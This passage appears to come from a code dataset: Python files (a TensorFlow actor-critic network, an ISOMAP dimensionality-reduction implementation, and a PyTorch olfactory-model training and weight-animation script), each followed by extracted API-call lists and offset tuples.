self.proto_size
]
sizes_np = np.interp(layer_idxs, layer_range, size_range)
sizes = list(sizes_np.astype(int))
proto = self.construct_mlp(input_obs,
sizes,
name="actor-mlp",
layer_norm=True,
activation=tf.nn.elu,
activation_final=tf.nn.tanh)
## Residual MLP variant
#proto_mlp = self.construct_resmlp(input_obs,
# 1024, 5,
# name="actor-res-mlp")
#proto_top0 = tfkl.Dense(1024,
# kernel_initializer=kernel_init,
# name="proto-fc1")(proto_mlp)
#proto_top1 = tf.nn.elu(proto_top0)
#proto_top2 = tfkl.Dense(1024,
# kernel_initializer=kernel_init,
# name="proto-fc2")(proto_top1)
#proto_top3 = tf.nn.elu(proto_top2)
#proto_top4 = tfkl.Dense(self.proto_size,
# kernel_initializer=kernel_init,
# name="proto-fc3")(proto_top3)
#proto = tf.nn.tanh(proto_top4)
# L2 Normalize actor output
#proto, _ = tf.linalg.normalize(proto, axis=-1, name="actor-norm")
# Backwards pass
actor_inputs = [ input_obs ]
actor_outputs = [ proto ]
self.actor = tfk.Model(inputs=actor_inputs,
outputs=actor_outputs,
name="actor_" + self.__class__.__name__)
self.actor_opt = tfko.Adam(lr=cfg.LR_ACTOR)
self.actor.compile(loss="mse", optimizer=self.actor_opt)
def construct_wg_critic(self):
input_obs_shape = (self.obs_size,)
input_obs = tfk.Input(dtype=tf.float32,
shape=input_obs_shape,
name='critic_obs')
input_proto_shape = (self.proto_size,)
input_proto = tfk.Input(dtype=tf.float32,
shape=input_proto_shape,
name='critic_proto')
input_concat = tf.concat([input_obs, input_proto], axis=-1,
name="critic_concat")
# Forward pass
## MLP variant
layer_n = 6
layer_idxs = np.arange(layer_n)
layer_range = [0, layer_n - 2, layer_n - 1]
size_range = [
1024,
128,
1
]
sizes_np = np.interp(layer_idxs, layer_range, size_range)
sizes = list(sizes_np.astype(int))
Q = self.construct_mlp(input_concat,
sizes,
name="critic-mlp",
layer_norm=False,
activation=tf.nn.elu,
activation_final=None)
## Residual MLP variant
#Q_mlp = self.construct_resmlp(input_concat, 1024, 8, "critic")
#Q_top0 = tfkl.Dense(512)(Q_mlp)
#Q_top1 = tf.nn.elu(Q_top0)
#Q_top2 = tfkl.Dense(256)(Q_top1)
#Q_top3 = tf.nn.elu(Q_top2)
#Q_top4 = tfkl.Dense(256)(Q_top3)
#Q = tfkl.Dense(1)(Q_top4)
# Backwards pass
critic_inputs = [ input_obs, input_proto ]
critic_outputs = [ Q ]
self.critic = tfk.Model(inputs=critic_inputs,
outputs=critic_outputs,
name="critic_" + self.__class__.__name__)
# Keras model
self.critic_opt = tfko.Adam(lr=cfg.LR_CRITIC)
self.critic.compile(loss="mse", optimizer=self.critic_opt)
@staticmethod
def update_target_hard(source_model, target_model):
# Get parameters to update
target_params = target_model.variables
source_params = source_model.variables
# Update each param
for src, dest in zip(source_params, target_params):
dest.assign(src)
@staticmethod
def update_target_soft(source_model, target_model, tau=1e-3):
tau_inv = 1.0 - tau
# Get parameters to update
target_params = target_model.variables
source_params = source_model.variables
# Update each param
for src, dest in zip(source_params, target_params):
            # Polyak averaging: dest <- tau * src + (1 - tau) * dest
var_update = src.value() * tau
var_persist = dest.value() * tau_inv
dest.assign(var_update + var_persist)
def save_network(self, path):
# Saves model at specified path
# Compute paths
obs_path = os.path.join(path, "obs.tf")
actor_path = os.path.join(path, "actor.tf")
critic_path = os.path.join(path, "critic.tf")
self.obs.save_weights(obs_path)
self.actor.save_weights(actor_path)
self.critic.save_weights(critic_path)
print("Successfully saved model at: {}".format(path))
def load_network(self, path):
# Compute paths
obs_path = os.path.join(path, "obs.tf")
actor_path = os.path.join(path, "actor.tf")
critic_path = os.path.join(path, "critic.tf")
self.obs.load_weights(obs_path)
self.actor.load_weights(actor_path)
self.critic.load_weights(critic_path)
        print("Successfully loaded network from: {}".format(path))
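# Illustrative usage (not part of the original file; the observation/proto sizes, the
# grid object, and `target_nn` (a second copy of the network) are assumed placeholders
# taken from whatever environment this agent wraps):
#
#     nn = WolperGrid_NN(gridobj, observation_size=100, proto_size=20, is_training=True)
#     obs_feat = nn.obs(obs_batch)       # identity mapping while obs_nn is False
#     proto = nn.actor(obs_feat)         # (batch, proto_size), in [-1, 1] via tanh
#     q = nn.critic([obs_feat, proto])   # (batch, 1) Q-value estimate
#     WolperGrid_NN.update_target_soft(nn.critic, target_nn.critic, tau=1e-3)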
|
[
"tensorflow.keras.layers.Dense",
"tensorflow.nn.tanh",
"tensorflow.keras.activations.linear",
"tensorflow.keras.Input",
"tensorflow.keras.initializers.HeNormal",
"tensorflow.keras.layers.LayerNormalization",
"tensorflow.concat",
"tensorflow.keras.initializers.GlorotNormal",
"tensorflow.keras.Model",
"tensorflow.keras.initializers.VarianceScaling",
"tensorflow.keras.optimizers.Adam",
"numpy.arange",
"numpy.interp",
"os.path.join"
] |
[((412, 485), 'tensorflow.keras.initializers.VarianceScaling', 'tfki.VarianceScaling', ([], {'distribution': '"""uniform"""', 'mode': '"""fan_out"""', 'scale': '(0.333)'}), "(distribution='uniform', mode='fan_out', scale=0.333)\n", (432, 485), True, 'import tensorflow.keras.initializers as tfki\n'), ((522, 541), 'tensorflow.keras.initializers.GlorotNormal', 'tfki.GlorotNormal', ([], {}), '()\n', (539, 541), True, 'import tensorflow.keras.initializers as tfki\n'), ((565, 580), 'tensorflow.keras.initializers.HeNormal', 'tfki.HeNormal', ([], {}), '()\n', (578, 580), True, 'import tensorflow.keras.initializers as tfki\n'), ((4590, 4654), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_shape', 'name': '"""input_obs"""'}), "(dtype=tf.float32, shape=input_shape, name='input_obs')\n", (4599, 4654), True, 'import tensorflow.keras as tfk\n'), ((5613, 5706), 'tensorflow.keras.Model', 'tfk.Model', ([], {'inputs': 'obs_inputs', 'outputs': 'obs_outputs', 'name': "('obs_' + self.__class__.__name__)"}), "(inputs=obs_inputs, outputs=obs_outputs, name='obs_' + self.\n __class__.__name__)\n", (5622, 5706), True, 'import tensorflow.keras as tfk\n'), ((5784, 5811), 'tensorflow.keras.optimizers.Adam', 'tfko.Adam', ([], {'lr': 'cfg.LR_CRITIC'}), '(lr=cfg.LR_CRITIC)\n', (5793, 5811), True, 'import tensorflow.keras.optimizers as tfko\n'), ((6011, 6075), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_shape', 'name': '"""actor_obs"""'}), "(dtype=tf.float32, shape=input_shape, name='actor_obs')\n", (6020, 6075), True, 'import tensorflow.keras as tfk\n'), ((6227, 6245), 'numpy.arange', 'np.arange', (['layer_n'], {}), '(layer_n)\n', (6236, 6245), True, 'import numpy as np\n'), ((6422, 6468), 'numpy.interp', 'np.interp', (['layer_idxs', 'layer_range', 'size_range'], {}), '(layer_idxs, layer_range, size_range)\n', (6431, 6468), True, 'import numpy as np\n'), ((7900, 7999), 'tensorflow.keras.Model', 'tfk.Model', ([], {'inputs': 'actor_inputs', 'outputs': 'actor_outputs', 'name': "('actor_' + self.__class__.__name__)"}), "(inputs=actor_inputs, outputs=actor_outputs, name='actor_' + self.\n __class__.__name__)\n", (7909, 7999), True, 'import tensorflow.keras as tfk\n'), ((8082, 8108), 'tensorflow.keras.optimizers.Adam', 'tfko.Adam', ([], {'lr': 'cfg.LR_ACTOR'}), '(lr=cfg.LR_ACTOR)\n', (8091, 8108), True, 'import tensorflow.keras.optimizers as tfko\n'), ((8273, 8342), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_obs_shape', 'name': '"""critic_obs"""'}), "(dtype=tf.float32, shape=input_obs_shape, name='critic_obs')\n", (8282, 8342), True, 'import tensorflow.keras as tfk\n'), ((8472, 8545), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_proto_shape', 'name': '"""critic_proto"""'}), "(dtype=tf.float32, shape=input_proto_shape, name='critic_proto')\n", (8481, 8545), True, 'import tensorflow.keras as tfk\n'), ((8634, 8700), 'tensorflow.concat', 'tf.concat', (['[input_obs, input_proto]'], {'axis': '(-1)', 'name': '"""critic_concat"""'}), "([input_obs, input_proto], axis=-1, name='critic_concat')\n", (8643, 8700), True, 'import tensorflow as tf\n'), ((8822, 8840), 'numpy.arange', 'np.arange', (['layer_n'], {}), '(layer_n)\n', (8831, 8840), True, 'import numpy as np\n'), ((8994, 9040), 'numpy.interp', 'np.interp', (['layer_idxs', 'layer_range', 'size_range'], {}), '(layer_idxs, layer_range, size_range)\n', (9003, 9040), True, 'import numpy as np\n'), ((9840, 9941), 
'tensorflow.keras.Model', 'tfk.Model', ([], {'inputs': 'critic_inputs', 'outputs': 'critic_outputs', 'name': "('critic_' + self.__class__.__name__)"}), "(inputs=critic_inputs, outputs=critic_outputs, name='critic_' +\n self.__class__.__name__)\n", (9849, 9941), True, 'import tensorflow.keras as tfk\n'), ((10050, 10077), 'tensorflow.keras.optimizers.Adam', 'tfko.Adam', ([], {'lr': 'cfg.LR_CRITIC'}), '(lr=cfg.LR_CRITIC)\n', (10059, 10077), True, 'import tensorflow.keras.optimizers as tfko\n'), ((11090, 11118), 'os.path.join', 'os.path.join', (['path', '"""obs.tf"""'], {}), "(path, 'obs.tf')\n", (11102, 11118), False, 'import os\n'), ((11140, 11170), 'os.path.join', 'os.path.join', (['path', '"""actor.tf"""'], {}), "(path, 'actor.tf')\n", (11152, 11170), False, 'import os\n'), ((11193, 11224), 'os.path.join', 'os.path.join', (['path', '"""critic.tf"""'], {}), "(path, 'critic.tf')\n", (11205, 11224), False, 'import os\n'), ((11496, 11524), 'os.path.join', 'os.path.join', (['path', '"""obs.tf"""'], {}), "(path, 'obs.tf')\n", (11508, 11524), False, 'import os\n'), ((11546, 11576), 'os.path.join', 'os.path.join', (['path', '"""actor.tf"""'], {}), "(path, 'actor.tf')\n", (11558, 11576), False, 'import os\n'), ((11599, 11630), 'os.path.join', 'os.path.join', (['path', '"""critic.tf"""'], {}), "(path, 'critic.tf')\n", (11611, 11630), False, 'import os\n'), ((1637, 1709), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['hidden_size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(hidden_size, kernel_initializer=kernel_init, name=layer_name)\n', (1647, 1709), True, 'import tensorflow.keras.layers as tfkl\n'), ((2071, 2089), 'tensorflow.nn.tanh', 'tf.nn.tanh', (['layer1'], {}), '(layer1)\n', (2081, 2089), True, 'import tensorflow as tf\n'), ((2390, 2455), 'tensorflow.keras.layers.LayerNormalization', 'tfkl.LayerNormalization', ([], {'trainable': 'self.is_training', 'name': 'ln_name'}), '(trainable=self.is_training, name=ln_name)\n', (2413, 2455), True, 'import tensorflow.keras.layers as tfkl\n'), ((3151, 3216), 'tensorflow.keras.layers.LayerNormalization', 'tfkl.LayerNormalization', ([], {'trainable': 'self.is_training', 'name': 'ln_name'}), '(trainable=self.is_training, name=ln_name)\n', (3174, 3216), True, 'import tensorflow.keras.layers as tfkl\n'), ((3380, 3411), 'tensorflow.nn.tanh', 'tf.nn.tanh', (['layer'], {'name': 'th_name'}), '(layer, name=th_name)\n', (3390, 3411), True, 'import tensorflow as tf\n'), ((4092, 4168), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['layer_sizes[-1]'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(layer_sizes[-1], kernel_initializer=kernel_init, name=layer_name)\n', (4102, 4168), True, 'import tensorflow.keras.layers as tfkl\n'), ((4811, 4829), 'numpy.arange', 'np.arange', (['layer_n'], {}), '(layer_n)\n', (4820, 4829), True, 'import numpy as np\n'), ((5000, 5046), 'numpy.interp', 'np.interp', (['layer_idxs', 'layer_range', 'size_range'], {}), '(layer_idxs, layer_range, size_range)\n', (5009, 5046), True, 'import numpy as np\n'), ((5502, 5524), 'tensorflow.keras.activations.linear', 'tfka.linear', (['input_obs'], {}), '(input_obs)\n', (5513, 5524), True, 'import tensorflow.keras.activations as tfka\n'), ((1904, 1976), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['hidden_size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(hidden_size, kernel_initializer=kernel_init, name=layer_name)\n', (1914, 1976), True, 'import tensorflow.keras.layers as tfkl\n'), ((2175, 2247), 'tensorflow.keras.layers.Dense', 
'tfkl.Dense', (['hidden_size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(hidden_size, kernel_initializer=kernel_init, name=layer_name)\n', (2185, 2247), True, 'import tensorflow.keras.layers as tfkl\n'), ((2945, 3018), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['layer_sizes[0]'], {'kernel_initializer': 'kernel_init', 'name': 'pre_name'}), '(layer_sizes[0], kernel_initializer=kernel_init, name=pre_name)\n', (2955, 3018), True, 'import tensorflow.keras.layers as tfkl\n'), ((3648, 3713), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(size, kernel_initializer=kernel_init, name=layer_name)\n', (3658, 3713), True, 'import tensorflow.keras.layers as tfkl\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: 11360
# datetime: 2021/3/14 13:41
import matplotlib.pyplot as plt
import numpy as np
from sklearn.datasets import make_swiss_roll
from scipy.spatial import KDTree
import mpl_toolkits.mplot3d.axes3d as p3
from sklearn.cluster import AgglomerativeClustering
class ShortestPath:
@staticmethod
def floyd_algorithm(adjacency_matrix):
"""
        Given the adjacency matrix of a weighted directed graph, compute the shortest path between every pair of vertices.
        :param adjacency_matrix: adjacency matrix; entry (i, j) is the edge weight from x_i to x_j
        :return: shortest-distance matrix, path matrix
"""
n = adjacency_matrix.shape[0]
path_matrix = -np.ones([n, n], dtype=int)
dist_matrix = adjacency_matrix.copy()
print("adjacency_matrix = ", adjacency_matrix)
n = path_matrix.shape[0]
for v in range(n):
            # loop over candidate intermediate vertices
for i in range(n):
for j in range(n):
if dist_matrix[i, j] > dist_matrix[i, v] + dist_matrix[v, j]:
dist_matrix[i, j] = dist_matrix[i, v] + dist_matrix[v, j]
path_matrix[i, j] = v
return dist_matrix, path_matrix
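    # Tiny worked example (illustrative): with adjacency matrix
    #   [[0, 2, 7],
    #    [2, 0, 3],
    #    [7, 3, 0]]
    # the direct 0 -> 2 distance of 7 is relaxed to 0 -> 1 -> 2 = 2 + 3 = 5,
    # and path_matrix[0, 2] is set to the intermediate vertex 1.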
@staticmethod
def print_floyd_path(path_matrix, source, destination):
if path_matrix[source, destination] < 0:
print("<{}, {}>".format(source, destination))
return
else:
            # intermediate vertex on the shortest path
mid = path_matrix[source, destination]
ShortestPath.print_floyd_path(path_matrix, source, mid)
ShortestPath.print_floyd_path(path_matrix, mid, destination)
@staticmethod
def djikstra_algorithm(adjacency_matrix, obj_vertice):
n = adjacency_matrix.shape[0]
musk_lst = [False for _ in range(n)]
dist_lst = [np.inf for _ in range(n)]
parent_lst = [-1 for _ in range(n)]
src_vertice = obj_vertice
dist_lst[src_vertice] = 0
while False in musk_lst:
musk_lst[src_vertice] = True
for i in range(n):
if adjacency_matrix[src_vertice, i] != np.inf:
if dist_lst[src_vertice] + adjacency_matrix[src_vertice, i] < dist_lst[i]:
dist_lst[i] = dist_lst[src_vertice] + adjacency_matrix[src_vertice, i]
parent_lst[i] = src_vertice
min_dist = np.inf
for j in range(n):
if musk_lst[j] == False and dist_lst[j] < min_dist:
min_dist = dist_lst[j]
src_vertice = j
print(dist_lst)
print(parent_lst)
return dist_lst, parent_lst
@staticmethod
def print_djikstra_path(parent_lst, obj_vertex):
        # path from the source vertex to the target vertex (obj_vertex)
a = obj_vertex
lst = []
while parent_lst[a] != -1:
lst.append(parent_lst[a])
a = parent_lst[a]
lst.reverse()
print("lst = ", lst)
for i in lst:
print(i, "->")
print(obj_vertex)
class ISOMAP:
def __init__(self, k):
"""
:param k: reduced dimension R^d -> R^k
"""
self.reduced_dimension = k
def make_data(self):
self.X_data, t = make_swiss_roll(1000, noise=0, random_state=0)
ward = AgglomerativeClustering(n_clusters=6, linkage='ward').fit(self.X_data)
self.Y_data = ward.labels_
def construct_graph(self, k):
"""
:param k: k-nearest neighbour
:return: adjacency matrix
"""
kd_tree = KDTree(self.X_data.copy())
n = self.X_data.shape[0]
adjacency_matrix = np.ones([n, n]) * np.inf
for i in range(n):
            # the k-NN query includes the point itself, so it has to be removed
dist_tuple, index_tuple = kd_tree.query(self.X_data[i, :], k=k+1, p=2)
dist_lst = list(dist_tuple)
index_lst = list(index_tuple)
remove_index = index_lst.index(i)
print(i, index_lst[remove_index])
dist_lst.pop(remove_index)
index_lst.pop(remove_index)
for index, value in enumerate(index_lst):
adjacency_matrix[i, value] = dist_tuple[index]
return adjacency_matrix
def Isomap(self, knn=5):
adjacency_matrix = self.construct_graph(knn)
dist_matrix, _ = ShortestPath.floyd_algorithm(adjacency_matrix)
self.D = dist_matrix
print("self.D = ", self.D)
self.MDS()
def MDS(self):
self.B = self.construct_innerprod_matrix()
if self.B is None:
return
        # A is the diagonal eigenvalue matrix, Q the matrix of eigenvectors
        # the inner-product matrix is symmetric positive semi-definite, so SVD yields its eigenvalues/eigenvectors
u, sigma, vT = np.linalg.svd(self.B)
Qk = u[:, :self.reduced_dimension]
Ak = np.diag(sigma[:self.reduced_dimension] ** 0.5)
self.new_data = Qk @ Ak
print("new_data.shape = ", self.new_data.shape)
def construct_innerprod_matrix(self):
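        # Classical MDS double centering (what the loops below implement):
        #   B[i, j] = -0.5 * (D[i, j]**2 - mean_i(D**2) - mean_j(D**2) + mean(D**2))
        # where the means are taken over row i, column j, and the whole matrix of
        # squared geodesic distances, respectively.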
inf_ = np.where(self.D == np.inf)
if inf_[0].shape[0] != 0:
print("shape = ", self.D.shape)
print("not connected graph!", self.D[inf_])
return
innerprod_matrix = np.zeros(self.D.shape)
length = self.D.shape[0]
meandist2 = np.mean(list(map(lambda x: x**2, self.D)))
meandist2_column_lst = []
for j in range(length):
meandist2_column_lst.append(np.mean(list(map(lambda x: x**2,
self.D[:, j]))))
for i in range(length):
meandist2_i_row = np.mean(list(map(lambda x: x**2, self.D[i, :])))
for j in range(i, length):
meandist2_j_column = meandist2_column_lst[j]
innerprod_matrix[i, j] = -0.5 * (self.D[i, j] ** 2 - meandist2_i_row -
meandist2_j_column + meandist2)
innerprod_matrix[j, i] = innerprod_matrix[i, j]
return innerprod_matrix
def result(self):
fig = plt.figure()
# plt.title("Origin data")
ax = p3.Axes3D(fig)
ax.view_init(7, -80)
for l in np.unique(self.Y_data):
ax.scatter(self.X_data[self.Y_data == l, 0], self.X_data[self.Y_data == l, 1],
self.X_data[self.Y_data == l, 2],
color=plt.cm.jet(float(l) / np.max(self.Y_data + 1)),
s=20, edgecolor='k')
plt.show()
# ax = plt.gca()
# ax.axis("equal")
plt.figure()
plt.title("MDS")
if self.reduced_dimension == 2:
print("self.new_data = ", self.new_data)
for l in np.unique(self.Y_data):
plt.scatter(self.new_data[self.Y_data == l, 0], self.new_data[self.Y_data == l, 1],
color=plt.cm.jet(float(l) / np.max(self.Y_data + 1)),
s=20, edgecolor='k')
else:
for l in np.unique(self.Y_data):
plt.scatter(self.new_data[self.Y_data == l, 0],
color=plt.cm.jet(float(l) / np.max(self.Y_data + 1)),
s=20, edgecolor='k')
ax = plt.gca()
ax.axis("equal")
plt.show()
if __name__ == "__main__":
    a = ISOMAP(2)  # reduce to 2 dimensions
    a.make_data()
    a.Isomap(10)  # build the neighborhood graph with k-NN (k=10)
a.result()
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.show",
"numpy.zeros",
"numpy.ones",
"sklearn.datasets.make_swiss_roll",
"matplotlib.pyplot.figure",
"numpy.linalg.svd",
"numpy.where",
"sklearn.cluster.AgglomerativeClustering",
"numpy.max",
"matplotlib.pyplot.gca",
"numpy.diag",
"mpl_toolkits.mplot3d.axes3d.Axes3D",
"numpy.unique"
] |
[((3258, 3304), 'sklearn.datasets.make_swiss_roll', 'make_swiss_roll', (['(1000)'], {'noise': '(0)', 'random_state': '(0)'}), '(1000, noise=0, random_state=0)\n', (3273, 3304), False, 'from sklearn.datasets import make_swiss_roll\n'), ((4712, 4733), 'numpy.linalg.svd', 'np.linalg.svd', (['self.B'], {}), '(self.B)\n', (4725, 4733), True, 'import numpy as np\n'), ((4792, 4838), 'numpy.diag', 'np.diag', (['(sigma[:self.reduced_dimension] ** 0.5)'], {}), '(sigma[:self.reduced_dimension] ** 0.5)\n', (4799, 4838), True, 'import numpy as np\n'), ((4990, 5016), 'numpy.where', 'np.where', (['(self.D == np.inf)'], {}), '(self.D == np.inf)\n', (4998, 5016), True, 'import numpy as np\n'), ((5204, 5226), 'numpy.zeros', 'np.zeros', (['self.D.shape'], {}), '(self.D.shape)\n', (5212, 5226), True, 'import numpy as np\n'), ((6065, 6077), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6075, 6077), True, 'import matplotlib.pyplot as plt\n'), ((6130, 6144), 'mpl_toolkits.mplot3d.axes3d.Axes3D', 'p3.Axes3D', (['fig'], {}), '(fig)\n', (6139, 6144), True, 'import mpl_toolkits.mplot3d.axes3d as p3\n'), ((6195, 6217), 'numpy.unique', 'np.unique', (['self.Y_data'], {}), '(self.Y_data)\n', (6204, 6217), True, 'import numpy as np\n'), ((6501, 6511), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6509, 6511), True, 'import matplotlib.pyplot as plt\n'), ((6575, 6587), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6585, 6587), True, 'import matplotlib.pyplot as plt\n'), ((6597, 6613), 'matplotlib.pyplot.title', 'plt.title', (['"""MDS"""'], {}), "('MDS')\n", (6606, 6613), True, 'import matplotlib.pyplot as plt\n'), ((7258, 7267), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (7265, 7267), True, 'import matplotlib.pyplot as plt\n'), ((7303, 7313), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7311, 7313), True, 'import matplotlib.pyplot as plt\n'), ((628, 654), 'numpy.ones', 'np.ones', (['[n, n]'], {'dtype': 'int'}), '([n, n], dtype=int)\n', (635, 654), True, 'import numpy as np\n'), ((3673, 3688), 'numpy.ones', 'np.ones', (['[n, n]'], {}), '([n, n])\n', (3680, 3688), True, 'import numpy as np\n'), ((6731, 6753), 'numpy.unique', 'np.unique', (['self.Y_data'], {}), '(self.Y_data)\n', (6740, 6753), True, 'import numpy as np\n'), ((7024, 7046), 'numpy.unique', 'np.unique', (['self.Y_data'], {}), '(self.Y_data)\n', (7033, 7046), True, 'import numpy as np\n'), ((3321, 3374), 'sklearn.cluster.AgglomerativeClustering', 'AgglomerativeClustering', ([], {'n_clusters': '(6)', 'linkage': '"""ward"""'}), "(n_clusters=6, linkage='ward')\n", (3344, 3374), False, 'from sklearn.cluster import AgglomerativeClustering\n'), ((6421, 6444), 'numpy.max', 'np.max', (['(self.Y_data + 1)'], {}), '(self.Y_data + 1)\n', (6427, 6444), True, 'import numpy as np\n'), ((6912, 6935), 'numpy.max', 'np.max', (['(self.Y_data + 1)'], {}), '(self.Y_data + 1)\n', (6918, 6935), True, 'import numpy as np\n'), ((7169, 7192), 'numpy.max', 'np.max', (['(self.Y_data + 1)'], {}), '(self.Y_data + 1)\n', (7175, 7192), True, 'import numpy as np\n')]
|
import os
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import collections as mc
import torch
import task
from torchmodel import FullModel
from configs import FullConfig
import tools
device = 'cuda' if torch.cuda.is_available() else 'cpu'
def train(config, reload=False, save_everytrainloss=False):
# Merge model config with config from dataset
dataset_config = tools.load_config(config.data_dir)
dataset_config.update(config)
config = dataset_config
for item in config.__dict__.items():
print(item)
if not os.path.exists(config.save_path):
os.makedirs(config.save_path)
# Save config
tools.save_config(config, save_path=config.save_path)
# Load dataset
train_x, train_y, val_x, val_y = task.load_data(config.data_dir)
batch_size = config.batch_size
model = FullModel(config=config)
model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=config.lr)
train_data = torch.from_numpy(train_x).float().to(device)
train_target = torch.from_numpy(train_y).long().to(device)
n_save_every = 20
ind_orn = list(range(0, 500, 50)) + list(range(1, 500, 50)) + list(range(2, 500, 50))
weight_layer1, weight_layer2 = [], []
k = 0
for ep in range(config.max_epoch):
if config.save_every_epoch:
model.save_pickle(ep)
model.save(ep)
print('[*' + '*'*50 + '*]')
print('Epoch {:d}'.format(ep))
model.train()
random_idx = np.random.permutation(config.n_train)
idx = 0
while idx < config.n_train:
if (idx//batch_size) % n_save_every == 0:
w_glo = model.w_glo
w_orn = model.w_orn
weight_layer1.append(w_orn[ind_orn, :])
weight_layer2.append(w_glo[:, :30])
k += 1
batch_indices = random_idx[idx:idx+batch_size]
idx += batch_size
res = model(train_data[batch_indices],
train_target[batch_indices])
optimizer.zero_grad()
res['loss'].backward()
optimizer.step()
np.save(os.path.join(config.save_path, 'w_layer1'), np.array(weight_layer1))
np.save(os.path.join(config.save_path, 'w_layer2'), np.array(weight_layer2))
def main_train():
config = FullConfig()
config.initial_pn2kc = 4. / config.N_PN # explicitly set for clarity
config.kc_prune_weak_weights = True
config.kc_prune_threshold = 1. / config.N_PN
config.kc_dropout_rate = 0.5
config.save_path = './files/movie'
config.max_epoch = 10
train(config)
def main_plot(path):
w1 = np.load(os.path.join(path, 'w_layer1.npy'))
w2 = np.load(os.path.join(path, 'w_layer2.npy'))
w1 = w1[:, :30, :]
w2 = w2[:, :, :5]
n_plot = 800
# n_plot = 100
w1 = w1[:n_plot]
w2 = w2[:n_plot]
w1 = w1[::2]
w2 = w2[::2]
# Normalize
w1 /= np.max(w1)
w2 /= np.max(w2)
rect = [0.1, 0.1, 0.8, 0.8]
fig = plt.figure(figsize=(7, 3))
ax = fig.add_axes(rect)
ax.set_xlim([-0.1, 2.1])
ax.set_ylim([-1, 51])
plt.axis('off')
x1, y1 = np.meshgrid(range(w1.shape[1]), range(w1.shape[2]))
x1, y1 = x1.flatten(), y1.flatten()
x2, y2 = np.meshgrid(range(w2.shape[1]), range(w2.shape[2]))
x2, y2 = x2.flatten(), y2.flatten()
lines = list()
lines += [[(0, x*49/29.), (1, y)] for x, y in zip(x1, y1)]
lines += [[(1, x), (2, y*49/4.)] for x, y in zip(x2, y2)]
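    # The 49/29 and 49/4 scale factors stretch the 30 ORN rows and the 5 KC rows over
    # the same 0-49 vertical span as the unscaled PN indices, so the three layers align.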
lc = mc.LineCollection(lines, linewidths=2)
ax.add_collection(lc)
colors1 = np.array([[228,26,28],[77,175,74],[55,126,184]])/255.
colors2 = np.array([[27,158,119],[217,95,2],[117,112,179],
[231,41,138],[102,166,30]])/255.
ind1 = np.array([0]*10+[1]*10+[2]*10)
ax.scatter([0]*w1.shape[1], np.arange(w1.shape[1])*49/29., color=colors1[ind1], s=4)
ax.scatter([2]*w2.shape[2], np.arange(w2.shape[2])*49/4., color=colors2, s=4)
y_text = 50
fontsize = 14
ax.text(-.05, y_text, 'ORNs', fontsize=fontsize)
ax.text(.95, y_text, 'PNs', fontsize=fontsize)
ax.text(1.95, y_text, 'KCs', fontsize=fontsize)
epoch_text = ax.text(1.85, -4, '0.00 Epochs', fontsize=fontsize)
# initialization function: plot the background of each frame
# =============================================================================
# def init():
# line.set_segments([])
# return line,
# =============================================================================
# animation function. This is called sequentially
def animate(i):
n1, n2 = len(x1), len(x2)
c = np.zeros((n1+n2, 4))
c[:n1, :3] = colors1[x1//10]
c[n1:, :3] = colors2[y2]
w1_ = w1[i].T.flatten()
w2_ = w2[i].T.flatten()
c[:n1, 3] = w1_ / w1_.max()
c[n1:, 3] = w2_ / w2_.max()
lc.set_color(c)
epoch_text.set_text(f'{i/40.:0.2f} Epochs')
return ax
# call the animator. blit=True means only re-draw the parts that have changed.
anim = animation.FuncAnimation(fig, animate,
frames=w1.shape[0], interval=20)
writer = animation.writers['ffmpeg'](fps=30)
# anim.save(os.path.join(path, 'movie.mp4'), writer=writer, dpi=600)
anim.save(os.path.join(path, 'movie.mp4'), writer=writer, dpi=200)
if __name__ == '__main__':
main_train()
path = './files/movie'
main_plot(path)
w1 = np.load(os.path.join(path, 'w_layer1.npy'))
w2 = np.load(os.path.join(path, 'w_layer2.npy'))
|
[
"torchmodel.FullModel",
"matplotlib.animation.FuncAnimation",
"matplotlib.pyplot.figure",
"tools.save_config",
"numpy.arange",
"os.path.join",
"configs.FullConfig",
"os.path.exists",
"numpy.max",
"matplotlib.collections.LineCollection",
"tools.load_config",
"torch.cuda.is_available",
"numpy.random.permutation",
"torch.from_numpy",
"task.load_data",
"os.makedirs",
"numpy.zeros",
"matplotlib.pyplot.axis",
"numpy.array"
] |
[((267, 292), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (290, 292), False, 'import torch\n'), ((437, 471), 'tools.load_config', 'tools.load_config', (['config.data_dir'], {}), '(config.data_dir)\n', (454, 471), False, 'import tools\n'), ((701, 754), 'tools.save_config', 'tools.save_config', (['config'], {'save_path': 'config.save_path'}), '(config, save_path=config.save_path)\n', (718, 754), False, 'import tools\n'), ((812, 843), 'task.load_data', 'task.load_data', (['config.data_dir'], {}), '(config.data_dir)\n', (826, 843), False, 'import task\n'), ((893, 917), 'torchmodel.FullModel', 'FullModel', ([], {'config': 'config'}), '(config=config)\n', (902, 917), False, 'from torchmodel import FullModel\n'), ((2391, 2403), 'configs.FullConfig', 'FullConfig', ([], {}), '()\n', (2401, 2403), False, 'from configs import FullConfig\n'), ((3005, 3015), 'numpy.max', 'np.max', (['w1'], {}), '(w1)\n', (3011, 3015), True, 'import numpy as np\n'), ((3026, 3036), 'numpy.max', 'np.max', (['w2'], 